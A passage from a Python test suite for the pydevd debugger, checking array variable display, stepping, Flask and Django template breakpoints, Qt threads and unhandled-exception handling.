'<var name="smallarray" type="ndarray" qualifier="numpy" value="ndarray%253A %255B 0.%252B1.j 1.%252B1.j 2.%252B1.j 3.%252B1.j 4.%252B1.j 5.%252B1.j 6.%252B1.j 7.%252B1.j 8.%252B1.j%250A 9.%252B1.j 10.%252B1.j 11.%252B1.j 12.%252B1.j 13.%252B1.j 14.%252B1.j 15.%252B1.j 16.%252B1.j 17.%252B1.j%250A 18.%252B1.j 19.%252B1.j 20.%252B1.j 21.%252B1.j 22.%252B1.j 23.%252B1.j 24.%252B1.j 25.%252B1.j 26.%252B1.j%250A 27.%252B1.j 28.%252B1.j 29.%252B1.j 30.%252B1.j 31.%252B1.j 32.%252B1.j 33.%252B1.j 34.%252B1.j 35.%252B1.j%250A 36.%252B1.j 37.%252B1.j 38.%252B1.j 39.%252B1.j 40.%252B1.j 41.%252B1.j 42.%252B1.j 43.%252B1.j 44.%252B1.j%250A 45.%252B1.j 46.%252B1.j 47.%252B1.j 48.%252B1.j 49.%252B1.j 50.%252B1.j 51.%252B1.j 52.%252B1.j 53.%252B1.j%250A 54.%252B1.j 55.%252B1.j 56.%252B1.j 57.%252B1.j 58.%252B1.j 59.%252B1.j 60.%252B1.j 61.%252B1.j 62.%252B1.j%250A 63.%252B1.j 64.%252B1.j 65.%252B1.j 66.%252B1.j 67.%252B1.j 68.%252B1.j 69.%252B1.j 70.%252B1.j 71.%252B1.j%250A 72.%252B1.j 73.%252B1.j 74.%252B1.j 75.%252B1.j 76.%252B1.j 77.%252B1.j 78.%252B1.j 79.%252B1.j 80.%252B1.j%250A 81.%252B1.j 82.%252B1.j 83.%252B1.j 84.%252B1.j 85.%252B1.j 86.%252B1.j 87.%252B1.j 88.%252B1.j 89.%252B1.j%250A 90.%252B1.j 91.%252B1.j 92.%252B1.j 93.%252B1.j 94.%252B1.j 95.%252B1.j 96.%252B1.j 97.%252B1.j 98.%252B1.j%250A 99.%252B1.j%255D" isContainer="True" />',
'<var name="smallarray" type="ndarray" qualifier="numpy" value="ndarray%253A %255B 0.%252B1.j 1.%252B1.j 2.%252B1.j 3.%252B1.j 4.%252B1.j 5.%252B1.j 6.%252B1.j 7.%252B1.j%250A 8.%252B1.j 9.%252B1.j 10.%252B1.j 11.%252B1.j 12.%252B1.j 13.%252B1.j 14.%252B1.j 15.%252B1.j%250A 16.%252B1.j 17.%252B1.j 18.%252B1.j 19.%252B1.j 20.%252B1.j 21.%252B1.j 22.%252B1.j 23.%252B1.j%250A 24.%252B1.j 25.%252B1.j 26.%252B1.j 27.%252B1.j 28.%252B1.j 29.%252B1.j 30.%252B1.j 31.%252B1.j%250A 32.%252B1.j 33.%252B1.j 34.%252B1.j 35.%252B1.j 36.%252B1.j 37.%252B1.j 38.%252B1.j 39.%252B1.j%250A 40.%252B1.j 41.%252B1.j 42.%252B1.j 43.%252B1.j 44.%252B1.j 45.%252B1.j 46.%252B1.j 47.%252B1.j%250A 48.%252B1.j 49.%252B1.j 50.%252B1.j 51.%252B1.j 52.%252B1.j 53.%252B1.j 54.%252B1.j 55.%252B1.j%250A 56.%252B1.j 57.%252B1.j 58.%252B1.j 59.%252B1.j 60.%252B1.j 61.%252B1.j 62.%252B1.j 63.%252B1.j%250A 64.%252B1.j 65.%252B1.j 66.%252B1.j 67.%252B1.j 68.%252B1.j 69.%252B1.j 70.%252B1.j 71.%252B1.j%250A 72.%252B1.j 73.%252B1.j 74.%252B1.j 75.%252B1.j 76.%252B1.j 77.%252B1.j 78.%252B1.j 79.%252B1.j%250A 80.%252B1.j 81.%252B1.j 82.%252B1.j 83.%252B1.j 84.%252B1.j 85.%252B1.j 86.%252B1.j 87.%252B1.j%250A 88.%252B1.j 89.%252B1.j 90.%252B1.j 91.%252B1.j 92.%252B1.j 93.%252B1.j 94.%252B1.j 95.%252B1.j%250A 96.%252B1.j 97.%252B1.j 98.%252B1.j 99.%252B1.j%255D" isContainer="True" />'
),
(
'<var name="bigarray" type="ndarray" qualifier="numpy" value="ndarray%253A %255B%255B 0 1 2 ... 9997 9998 9999%255D%250A %255B10000 10001 10002 ... 19997 19998 19999%255D%250A %255B20000 20001 20002 ... 29997 29998 29999%255D%250A ...%250A %255B70000 70001 70002 ... 79997 79998 79999%255D%250A %255B80000 80001 80002 ... 89997 89998 89999%255D%250A %255B90000 90001 90002 ... 99997 99998 99999%255D%255D" isContainer="True" />',
'<var name="bigarray" type="ndarray" qualifier="numpy" value="ndarray%253A %255B%255B 0 1 2 ...%252C 9997 9998 9999%255D%250A %255B10000 10001 10002 ...%252C 19997 19998 19999%255D%250A %255B20000 20001 20002 ...%252C 29997 29998 29999%255D%250A ...%252C %250A %255B70000 70001 70002 ...%252C 79997 79998 79999%255D%250A %255B80000 80001 80002 ...%252C 89997 89998 89999%255D%250A %255B90000 90001 90002 ...%252C 99997 99998 99999%255D%255D" isContainer="True" />'
),
# Any of the ones below will do.
(
'<var name="hugearray" type="ndarray" qualifier="numpy" value="ndarray%253A %255B 0 1 2 ... 9999997 9999998 9999999%255D" isContainer="True" />',
'<var name="hugearray" type="ndarray" qualifier="numpy" value="ndarray%253A %255B 0 1 2 ...%252C 9999997 9999998 9999999%255D" isContainer="True" />'
)
))
# For each variable, check each of the resolved (meta data) attributes...
writer.write_get_variable(hit.thread_id, hit.frame_id, 'smallarray')
writer.wait_for_multiple_vars((
'<var name="min" type="complex128"',
'<var name="max" type="complex128"',
'<var name="shape" type="tuple"',
'<var name="dtype" type="dtype"',
'<var name="size" type="int"',
))
# ...and check that the internals are resolved properly
writer.write_get_variable(hit.thread_id, hit.frame_id, 'smallarray\t__internals__')
writer.wait_for_var('<var name="%27size%27')
writer.write_get_variable(hit.thread_id, hit.frame_id, 'bigarray')
# isContainer could be true on some numpy versions, so, we only check for the var begin.
writer.wait_for_multiple_vars((
[
'<var name="min" type="int64" qualifier="numpy" value="int64%253A 0"',
'<var name="min" type="int64" qualifier="numpy" value="int64%3A 0"',
'<var name="size" type="int" qualifier="{0}" value="int%3A 100000"'.format(builtin_qualifier),
],
[
'<var name="max" type="int64" qualifier="numpy" value="int64%253A 99999"',
'<var name="max" type="int32" qualifier="numpy" value="int32%253A 99999"',
'<var name="max" type="int64" qualifier="numpy" value="int64%3A 99999"',
'<var name="max" type="int32" qualifier="numpy" value="int32%253A 99999"',
],
'<var name="shape" type="tuple"',
'<var name="dtype" type="dtype"',
'<var name="size" type="int"'
))
writer.write_get_variable(hit.thread_id, hit.frame_id, 'bigarray\t__internals__')
writer.wait_for_var('<var name="%27size%27')
# this one is different because it crosses the magic threshold where we don't calculate
# the min/max
writer.write_get_variable(hit.thread_id, hit.frame_id, 'hugearray')
writer.wait_for_var((
[
'<var name="min" type="str" qualifier={0} value="str%253A ndarray too big%252C calculating min would slow down debugging" />'.format(builtin_qualifier),
'<var name="min" type="str" qualifier={0} value="str%3A ndarray too big%252C calculating min would slow down debugging" />'.format(builtin_qualifier),
'<var name="min" type="str" qualifier="{0}" value="str%253A ndarray too big%252C calculating min would slow down debugging" />'.format(builtin_qualifier),
'<var name="min" type="str" qualifier="{0}" value="str%3A ndarray too big%252C calculating min would slow down debugging" />'.format(builtin_qualifier),
],
[
'<var name="max" type="str" qualifier={0} value="str%253A ndarray too big%252C calculating max would slow down debugging" />'.format(builtin_qualifier),
'<var name="max" type="str" qualifier={0} value="str%3A ndarray too big%252C calculating max would slow down debugging" />'.format(builtin_qualifier),
'<var name="max" type="str" qualifier="{0}" value="str%253A ndarray too big%252C calculating max would slow down debugging" />'.format(builtin_qualifier),
'<var name="max" type="str" qualifier="{0}" value="str%3A ndarray too big%252C calculating max would slow down debugging" />'.format(builtin_qualifier),
],
'<var name="shape" type="tuple"',
'<var name="dtype" type="dtype"',
'<var name="size" type="int"',
))
writer.write_get_variable(hit.thread_id, hit.frame_id, 'hugearray\t__internals__')
writer.wait_for_var('<var name="%27size%27')
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_17(case_setup):
# Check dont trace
with case_setup.test_file('_debugger_case17.py') as writer:
writer.write_enable_dont_trace(True)
writer.write_add_breakpoint(27, 'main')
writer.write_add_breakpoint(29, 'main')
writer.write_add_breakpoint(31, 'main')
writer.write_add_breakpoint(33, 'main')
writer.write_make_initial_run()
for _i in range(4):
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT)
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('107', line=2)
# Should Skip step into properties setter
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_17a(case_setup):
# Check dont trace return
with case_setup.test_file('_debugger_case17a.py') as writer:
writer.write_enable_dont_trace(True)
writer.write_add_breakpoint(2, 'm1')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT, line=2)
writer.write_step_in(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('107', line=10)
# Should Skip step into properties setter
assert hit.name == 'm3'
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_18(case_setup):
# change local variable
if IS_IRONPYTHON or IS_JYTHON:
pytest.skip('Unsupported assign to local')
with case_setup.test_file('_debugger_case18.py') as writer:
writer.write_add_breakpoint(5, 'm2')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT, line=5)
writer.write_change_variable(hit.thread_id, hit.frame_id, 'a', '40')
writer.wait_for_var('<xml><var name="" type="int" qualifier="{0}" value="int%253A 40" />%0A</xml>'.format(builtin_qualifier,))
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_case_19(case_setup):
# Check evaluate '__' attributes
with case_setup.test_file('_debugger_case19.py') as writer:
writer.write_add_breakpoint(8, None)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT, line=8)
writer.write_evaluate_expression('%s\t%s\t%s' % (hit.thread_id, hit.frame_id, 'LOCAL'), 'a.__var')
writer.wait_for_evaluation([
[
'<var name="a.__var" type="int" qualifier="{0}" value="int'.format(builtin_qualifier),
'<var name="a.__var" type="int" value="int', # jython
]
])
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Monkey-patching related to starting threads not done on Jython.')
def test_case_20(case_setup):
# Check that we were notified of threads creation before they started to run
with case_setup.test_file('_debugger_case20.py') as writer:
writer.write_make_initial_run()
# We already check if it prints 'TEST SUCEEDED' by default, so, nothing
# else should be needed in this test as it tests what's needed just by
# running the module.
writer.finished_ok = True
@pytest.mark.skipif(not TEST_FLASK, reason='No flask available')
def test_case_flask(case_setup_flask):
with case_setup_flask.test_file(EXPECTED_RETURNCODE='any') as writer:
writer.write_multi_threads_single_notification(True)
writer.write_add_breakpoint_jinja2(5, None, 'hello.html')
writer.write_add_breakpoint_jinja2(8, None, 'hello.html')
writer.write_make_initial_run()
t = writer.create_request_thread()
time.sleep(2) # Give flask some time to get to startup before requesting the page
t.start()
hit = writer.wait_for_single_notification_as_hit(line=5)
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_vars(['<var name="content" type="str"'])
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_single_notification_as_hit(line=8)
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_vars(['<var name="content" type="str"'])
writer.write_run_thread(hit.thread_id)
contents = t.wait_for_contents()
assert '<title>Hello</title>' in contents
assert 'Flask-Jinja-Test' in contents
writer.finished_ok = True
@pytest.mark.skipif(not TEST_DJANGO, reason='No django available')
def test_case_django_a(case_setup_django):
def get_environ(writer):
env = os.environ.copy()
env.update({
'PYDEVD_FILTER_LIBRARIES': '1', # Global setting for in project or not
})
return env
with case_setup_django.test_file(EXPECTED_RETURNCODE='any', get_environ=get_environ) as writer:
writer.write_add_breakpoint_django(5, None, 'index.html')
writer.write_make_initial_run()
t = writer.create_request_thread('my_app')
time.sleep(5) # Give django some time to get to startup before requesting the page
t.start()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT, line=5)
writer.write_get_variable(hit.thread_id, hit.frame_id, 'entry')
writer.wait_for_vars([
'<var name="key" type="str"',
'v1'
])
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT, line=5)
writer.write_get_variable(hit.thread_id, hit.frame_id, 'entry')
writer.wait_for_vars([
'<var name="key" type="str"',
'v2'
])
writer.write_run_thread(hit.thread_id)
contents = t.wait_for_contents()
contents = contents.replace(' ', '').replace('\r', '').replace('\n', '')
if contents != '<ul><li>v1:v1</li><li>v2:v2</li></ul>':
raise AssertionError('%s != <ul><li>v1:v1</li><li>v2:v2</li></ul>' % (contents,))
writer.finished_ok = True
@pytest.mark.skipif(not TEST_DJANGO, reason='No django available')
def test_case_django_b(case_setup_django):
with case_setup_django.test_file(EXPECTED_RETURNCODE='any') as writer:
writer.write_add_breakpoint_django(4, None, 'name.html')
writer.write_add_exception_breakpoint_django()
writer.write_remove_exception_breakpoint_django()
writer.write_make_initial_run()
t = writer.create_request_thread('my_app/name')
time.sleep(5) # Give django some time to get to startup before requesting the page
t.start()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT, line=4)
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_var('<var name="form" type="NameForm" qualifier="my_app.forms" value="NameForm%253A')
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not TEST_DJANGO, reason='No django available')
def test_case_django_template_inherits_no_exception(case_setup_django):
with case_setup_django.test_file(EXPECTED_RETURNCODE='any') as writer:
# Check that it doesn't have issues with inherits + django exception breakpoints.
writer.write_add_exception_breakpoint_django()
writer.write_make_initial_run()
t = writer.create_request_thread('my_app/inherits')
time.sleep(5) # Give django some time to get to startup before requesting the page
t.start()
contents = t.wait_for_contents()
contents = contents.replace(' ', '').replace('\r', '').replace('\n', '')
assert contents == '''"chat_mode=True""chat_mode=False"'''
writer.finished_ok = True
@pytest.mark.skipif(not TEST_DJANGO, reason='No django available')
def test_case_django_no_var_error(case_setup_django):
with case_setup_django.test_file(EXPECTED_RETURNCODE='any') as writer:
# Check that it doesn't have issues with inherits + django exception breakpoints.
writer.write_add_exception_breakpoint_django()
writer.write_make_initial_run()
t = writer.create_request_thread('my_app/no_var_error')
time.sleep(5) # Give django some time to get to startup before requesting the page
t.start()
contents = t.wait_for_contents()
contents = contents.replace(' ', '').replace('\r', '').replace('\n', '')
assert contents == '''no_pat_name'''
writer.finished_ok = True
@pytest.mark.skipif(not TEST_DJANGO, reason='No django available')
@pytest.mark.parametrize("jmc", [False, True])
def test_case_django_no_attribute_exception_breakpoint(case_setup_django, jmc):
kwargs = {}
if jmc:
def get_environ(writer):
env = os.environ.copy()
env.update({
'PYDEVD_FILTER_LIBRARIES': '1', # Global setting for in project or not
})
return env
kwargs['get_environ'] = get_environ
with case_setup_django.test_file(EXPECTED_RETURNCODE='any', **kwargs) as writer:
writer.write_add_exception_breakpoint_django()
writer.write_make_initial_run()
t = writer.create_request_thread('my_app/template_error')
time.sleep(5) # Give django some time to get to startup before requesting the page
t.start()
hit = writer.wait_for_breakpoint_hit(REASON_CAUGHT_EXCEPTION, line=7, file='template_error.html')
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_var('<var name="entry" type="Entry" qualifier="my_app.views" value="Entry: v1:v1" isContainer="True"')
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not TEST_DJANGO, reason='No django available')
def test_case_django_no_attribute_exception_breakpoint_and_regular_exceptions(case_setup_django):
with case_setup_django.test_file(EXPECTED_RETURNCODE='any') as writer:
writer.write_add_exception_breakpoint_django()
# The django plugin has priority over the regular exception breakpoint.
writer.write_add_exception_breakpoint_with_policy(
'django.template.base.VariableDoesNotExist',
notify_on_handled_exceptions=2, # 2 means notify only on first raise.
notify_on_unhandled_exceptions=0,
ignore_libraries=0
)
writer.write_make_initial_run()
t = writer.create_request_thread('my_app/template_error')
time.sleep(5) # Give django some time to get to startup before requesting the page
t.start()
hit = writer.wait_for_breakpoint_hit(REASON_CAUGHT_EXCEPTION, line=7, file='template_error.html')
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_var('<var name="entry" type="Entry" qualifier="my_app.views" value="Entry: v1:v1" isContainer="True"')
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not TEST_DJANGO, reason='No django available')
@pytest.mark.parametrize("jmc", [False, True])
def test_case_django_invalid_template_exception_breakpoint(case_setup_django, jmc):
kwargs = {}
if jmc:
def get_environ(writer):
env = os.environ.copy()
env.update({
'PYDEVD_FILTER_LIBRARIES': '1', # Global setting for in project or not
})
return env
kwargs['get_environ'] = get_environ
with case_setup_django.test_file(EXPECTED_RETURNCODE='any', **kwargs) as writer:
writer.write_add_exception_breakpoint_django()
writer.write_make_initial_run()
t = writer.create_request_thread('my_app/template_error2')
time.sleep(5) # Give django some time to get to startup before requesting the page
t.start()
hit = writer.wait_for_breakpoint_hit(REASON_CAUGHT_EXCEPTION, line=4, file='template_error2.html')
writer.write_get_frame(hit.thread_id, hit.frame_id)
writer.wait_for_var('<var name="token" type="Token" qualifier="django.template.base" value="Token:')
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
@pytest.mark.skipif(not TEST_CYTHON, reason='No cython available')
def test_cython(case_setup):
from _pydevd_bundle import pydevd_cython
assert pydevd_cython.trace_dispatch is not None
def _has_qt():
try:
try:
from PySide import QtCore # @UnresolvedImport
return True
except:
from PySide2 import QtCore # @UnresolvedImport
return True
except:
try:
from PyQt4 import QtCore # @UnresolvedImport
return True
except:
try:
from PyQt5 import QtCore # @UnresolvedImport
return True
except:
pass
return False
@pytest.mark.skipif(not _has_qt(), reason='No qt available')
def test_case_qthread1(case_setup):
with case_setup.test_file('_debugger_case_qthread1.py') as writer:
breakpoint_id = writer.write_add_breakpoint(writer.get_line_index_with_content('break here'), 'run')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_remove_breakpoint(breakpoint_id)
writer.write_run_thread(hit.thread_id)
writer.log.append('Checking sequence. Found: %s' % (writer._sequence))
assert 9 == writer._sequence, 'Expected 9. Had: %s' % writer._sequence
writer.log.append('Marking finished ok.')
writer.finished_ok = True
@pytest.mark.skipif(not _has_qt(), reason='No qt available')
def test_case_qthread2(case_setup):
with case_setup.test_file('_debugger_case_qthread2.py') as writer:
breakpoint_id = writer.write_add_breakpoint(writer.get_line_index_with_content('break here'), 'long_running')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
writer.write_remove_breakpoint(breakpoint_id)
writer.write_run_thread(thread_id)
writer.log.append('Checking sequence. Found: %s' % (writer._sequence))
assert 9 == writer._sequence, 'Expected 9. Had: %s' % writer._sequence
writer.log.append('Marking finished ok.')
writer.finished_ok = True
@pytest.mark.skipif(not _has_qt(), reason='No qt available')
def test_case_qthread3(case_setup):
with case_setup.test_file('_debugger_case_qthread3.py') as writer:
breakpoint_id = writer.write_add_breakpoint(writer.get_line_index_with_content('break here'), 'run')
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
thread_id = hit.thread_id
frame_id = hit.frame_id
writer.write_remove_breakpoint(breakpoint_id)
writer.write_run_thread(thread_id)
writer.log.append('Checking sequence. Found: %s' % (writer._sequence))
assert 9 == writer._sequence, 'Expected 9. Had: %s' % writer._sequence
writer.log.append('Marking finished ok.')
writer.finished_ok = True
@pytest.mark.skipif(not _has_qt(), reason='No qt available')
def test_case_qthread4(case_setup):
with case_setup.test_file('_debugger_case_qthread4.py') as writer:
original_additional_output_checks = writer.additional_output_checks
def additional_output_checks(stdout, stderr):
original_additional_output_checks(stdout, stderr)
if 'On start called' not in stdout:
raise AssertionError('Expected "On start called" to be in stdout:\n%s' % (stdout,))
if 'Done sleeping' not in stdout:
raise AssertionError('Expected "Done sleeping" to be in stdout:\n%s' % (stdout,))
if 'native Qt signal is not callable' in stderr:
raise AssertionError('Did not expect "native Qt signal is not callable" to be in stderr:\n%s' % (stderr,))
breakpoint_id = writer.write_add_breakpoint(28, 'on_start') # breakpoint on print('On start called2').
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit()
writer.write_remove_breakpoint(breakpoint_id)
writer.write_run_thread(hit.thread_id)
writer.log.append('Checking sequence. Found: %s' % (writer._sequence))
assert 9 == writer._sequence, 'Expected 9. Had: %s' % writer._sequence
writer.log.append('Marking finished ok.')
writer.finished_ok = True
def test_m_switch(case_setup_m_switch):
with case_setup_m_switch.test_file() as writer:
writer.log.append('writing add breakpoint')
breakpoint_id = writer.write_add_breakpoint(1, None)
writer.log.append('making initial run')
writer.write_make_initial_run()
writer.log.append('waiting for breakpoint hit')
hit = writer.wait_for_breakpoint_hit()
writer.write_remove_breakpoint(breakpoint_id)
writer.log.append('run thread')
writer.write_run_thread(hit.thread_id)
writer.log.append('asserting')
try:
assert 9 == writer._sequence, 'Expected 9. Had: %s' % writer._sequence
except:
writer.log.append('assert failed!')
raise
writer.log.append('asserted')
writer.finished_ok = True
def test_module_entry_point(case_setup_m_switch_entry_point):
with case_setup_m_switch_entry_point.test_file() as writer:
writer.log.append('writing add breakpoint')
breakpoint_id = writer.write_add_breakpoint(1, None)
writer.log.append('making initial run')
writer.write_make_initial_run()
writer.log.append('waiting for breakpoint hit')
hit = writer.wait_for_breakpoint_hit()
writer.write_remove_breakpoint(breakpoint_id)
writer.log.append('run thread')
writer.write_run_thread(hit.thread_id)
writer.log.append('asserting')
try:
assert 9 == writer._sequence, 'Expected 9. Had: %s' % writer._sequence
except:
writer.log.append('assert failed!')
raise
writer.log.append('asserted')
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='CPython only test.')
def test_check_tracer_with_exceptions(case_setup):
def get_environ(writer):
env = os.environ.copy()
# This test requires regular tracing (without cython).
env['PYDEVD_USE_CYTHON'] = 'NO'
env['PYDEVD_USE_FRAME_EVAL'] = 'NO'
return env
with case_setup.test_file('_debugger_case_check_tracer.py', get_environ=get_environ) as writer:
writer.write_add_exception_breakpoint_with_policy('IndexError', "1", "1", "1")
writer.write_make_initial_run()
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Failing on Jython -- needs to be investigated).')
def test_unhandled_exceptions_basic(case_setup):
def check_test_suceeded_msg(writer, stdout, stderr):
# Don't call super (we have an unhandled exception in the stack trace).
return 'TEST SUCEEDED' in ''.join(stdout) and 'TEST SUCEEDED' in ''.join(stderr)
def additional_output_checks(writer, stdout, stderr):
if 'raise Exception' not in stderr:
raise AssertionError('Expected test to have an unhandled exception.\nstdout:\n%s\n\nstderr:\n%s' % (
stdout, stderr))
with case_setup.test_file(
'_debugger_case_unhandled_exceptions.py',
check_test_suceeded_msg=check_test_suceeded_msg,
additional_output_checks=additional_output_checks,
EXPECTED_RETURNCODE=1,
) as writer:
writer.write_add_exception_breakpoint_with_policy('Exception', "0", "1", "0")
writer.write_make_initial_run()
def check(hit, exc_type, exc_desc):
writer.write_get_current_exception(hit.thread_id)
msg = writer.wait_for_message(accept_message=lambda msg:exc_type in msg and 'exc_type="' in msg and 'exc_desc="' in msg, unquote_msg=False)
assert unquote(msg.thread['exc_desc']) == exc_desc
assert unquote(msg.thread['exc_type']) in (
"<type 'exceptions.%s'>" % (exc_type,), # py2
"<class '%s'>" % (exc_type,) # py3
)
if len(msg.thread.frame) == 0:
assert unquote(unquote(msg.thread.frame['file'])).endswith('_debugger_case_unhandled_exceptions.py')
else:
assert unquote(unquote(msg.thread.frame[0]['file'])).endswith('_debugger_case_unhandled_exceptions.py')
writer.write_run_thread(hit.thread_id)
# Will stop in 2 background threads
hit0 = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
thread_id1 = hit0.thread_id
hit1 = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
thread_id2 = hit1.thread_id
if hit0.name == 'thread_func2':
check(hit0, 'ValueError', 'in thread 2')
check(hit1, 'Exception', 'in thread 1')
else:
check(hit0, 'Exception', 'in thread 1')
check(hit1, 'ValueError', 'in thread 2')
writer.write_run_thread(thread_id1)
writer.write_run_thread(thread_id2)
# Will stop in main thread
hit = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
assert hit.name == '<module>'
thread_id3 = hit.thread_id
# Requesting the stack in an unhandled exception should provide the stack of the exception,
# not the current location of the program.
writer.write_get_thread_stack(thread_id3)
msg = writer.wait_for_message(CMD_GET_THREAD_STACK)
assert len(msg.thread.frame) == 0 # In main thread (must have no back frames).
assert msg.thread.frame['name'] == '<module>'
check(hit, 'IndexError', 'in main')
writer.log.append('Marking finished ok.')
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Failing on Jython -- needs to be investigated).')
def test_unhandled_exceptions_in_top_level1(case_setup_unhandled_exceptions):
with case_setup_unhandled_exceptions.test_file(
'_debugger_case_unhandled_exceptions_on_top_level.py',
EXPECTED_RETURNCODE=1,
) as writer:
writer.write_add_exception_breakpoint_with_policy('Exception', "0", "1", "0")
writer.write_make_initial_run()
# Will stop in main thread
hit = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
writer.log.append('Marking finished ok.')
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Failing on Jython -- needs to be investigated).')
def test_unhandled_exceptions_in_top_level2(case_setup_unhandled_exceptions):
# Note: expecting unhandled exception to be printed to stderr.
def get_environ(writer):
env = os.environ.copy()
curr_pythonpath = env.get('PYTHONPATH', '')
pydevd_dirname = os.path.dirname(writer.get_pydevd_file())
curr_pythonpath = pydevd_dirname + os.pathsep + curr_pythonpath
env['PYTHONPATH'] = curr_pythonpath
return env
def update_command_line_args(writer, args):
# Start pydevd with '-m' to see how it deal with being called with
# runpy at the start.
assert args[0].endswith('pydevd.py')
args = ['-m', 'pydevd'] + args[1:]
return args
with case_setup_unhandled_exceptions.test_file(
'_debugger_case_unhandled_exceptions_on_top_level.py',
get_environ=get_environ,
update_command_line_args=update_command_line_args,
EXPECTED_RETURNCODE='any',
) as writer:
writer.write_add_exception_breakpoint_with_policy('Exception', "0", "1", "0")
writer.write_make_initial_run()
# Should stop (only once) in the main thread.
hit = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
writer.log.append('Marking finished ok.')
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Failing on Jython -- needs to be investigated).')
def test_unhandled_exceptions_in_top_level3(case_setup_unhandled_exceptions):
with case_setup_unhandled_exceptions.test_file(
'_debugger_case_unhandled_exceptions_on_top_level.py',
EXPECTED_RETURNCODE=1
) as writer:
# Handled and unhandled
writer.write_add_exception_breakpoint_with_policy('Exception', "1", "1", "0")
writer.write_make_initial_run()
# Will stop in main thread twice: once one we find that the exception is being
# thrown and another in postmortem mode when we discover it's uncaught.
hit = writer.wait_for_breakpoint_hit(REASON_CAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
writer.log.append('Marking finished ok.')
writer.finished_ok = True
@pytest.mark.skipif(IS_JYTHON, reason='Failing on Jython -- needs to be investigated).')
def test_unhandled_exceptions_in_top_level4(case_setup_unhandled_exceptions):
# Note: expecting unhandled exception to be printed to stderr.
with case_setup_unhandled_exceptions.test_file(
'_debugger_case_unhandled_exceptions_on_top_level2.py',
EXPECTED_RETURNCODE=1,
) as writer:
# Handled and unhandled
writer.write_add_exception_breakpoint_with_policy('Exception', "1", "1", "0")
writer.write_make_initial_run()
# We have an exception thrown and handled and another which is thrown and is then unhandled.
hit = writer.wait_for_breakpoint_hit(REASON_CAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_CAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
hit = writer.wait_for_breakpoint_hit(REASON_UNCAUGHT_EXCEPTION)
writer.write_run_thread(hit.thread_id)
writer.log.append('Marking finished ok.')
writer.finished_ok = True
@pytest.mark.skipif(not IS_CPYTHON, reason='Only for Python.')
def test_case_set_next_statement(case_setup):
with case_setup.test_file('_debugger_case_set_next_statement.py') as writer:
breakpoint_id = writer.write_add_breakpoint(6, None)
writer.write_make_initial_run()
hit = writer.wait_for_breakpoint_hit(REASON_STOP_ON_BREAKPOINT, line=6) # Stop in line a=3 (before setting it)
writer.write_evaluate_expression('%s\t%s\t%s' % (hit.thread_id, hit.frame_id, 'LOCAL'), 'a')
writer.wait_for_evaluation('<var name="a" type="int" qualifier="{0}" value="int: 2"'.format(builtin_qualifier))
writer.write_set_next_statement(hit.thread_id, 2, 'method')
hit = writer.wait_for_breakpoint_hit('127', line=2)
# Check that it's still unchanged
writer.write_evaluate_expression('%s\t%s\t%s' % (hit.thread_id, hit.frame_id, 'LOCAL'), 'a')
writer.wait_for_evaluation('<var name="a" type="int" qualifier="{0}" value="int: 2"'.format(builtin_qualifier))
# After a step over it should become 1 as we executed line which sets a = 1
writer.write_step_over(hit.thread_id)
hit = writer.wait_for_breakpoint_hit('108')
writer.write_evaluate_expression('%s\t%s\t%s' % (hit.thread_id, hit.frame_id, 'LOCAL'), 'a')
writer.wait_for_evaluation('<var name="a" type="int" qualifier="{0}" value="int: 1"'.format(builtin_qualifier))
writer.write_remove_breakpoint(breakpoint_id)
writer.write_run_thread(hit.thread_id)
writer.finished_ok = True
def test_unhandled_exceptions_get_stack(case_setup_unhandled_exceptions):
